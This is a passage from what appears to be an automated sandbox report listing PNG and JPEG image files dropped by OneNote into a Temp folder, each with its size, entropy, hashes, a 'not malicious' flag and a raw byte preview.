                                                                                                  Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                  C:\Users\user\AppData\Local\Temp\{1A7FDF1F-DB44-4273-A46A-D268D33AB361}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Temp\{1B16338B-5F9A-4E2B-85FD-59278ED2A5A8}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11043
                                                                                                  Entropy (8bit):7.96811228801767
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                  MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                  SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                  SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                  SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                  C:\Users\user\AppData\Local\Temp\{1C2DF11E-F290-4053-BE47-E77121DB68E9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Temp\{1D2BCCE1-8F73-42C1-8EC2-E6E9D4D34542}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84941
                                                                                                  Entropy (8bit):7.966881945560921
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                  MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                  SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                  SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                  SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                  C:\Users\user\AppData\Local\Temp\{1D6F4A18-FA5A-4B86-84F3-B90E61D34F4B}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Temp\{1EA54A45-ADB6-405A-BCC8-9E3BE666974D}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Temp\{1F299545-F6E1-4855-A36F-ECB906CD24D7}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):86187
                                                                                                  Entropy (8bit):7.951356272886186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                  MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                  SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                  SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                  SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                  C:\Users\user\AppData\Local\Temp\{1FAC2C35-959F-4E3D-8E93-216CED0C1DF8}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12654
                                                                                                  Entropy (8bit):7.745439197485533
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                  MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                  SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                  SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                  SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                  C:\Users\user\AppData\Local\Temp\{200CC703-7716-450F-AFD7-9138E62F655D}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12824
                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Temp\{205665FD-847D-4A2E-A2A0-6BCFEBD60543}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{221B2C47-E930-47E4-BFB7-7A58FE8CE57A}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Temp\{23A2F287-EBF3-4B35-BFDA-3D2EE76E93B0}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14177
                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                  C:\Users\user\AppData\Local\Temp\{2552F201-51C8-4704-8061-87A8FC95E21E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
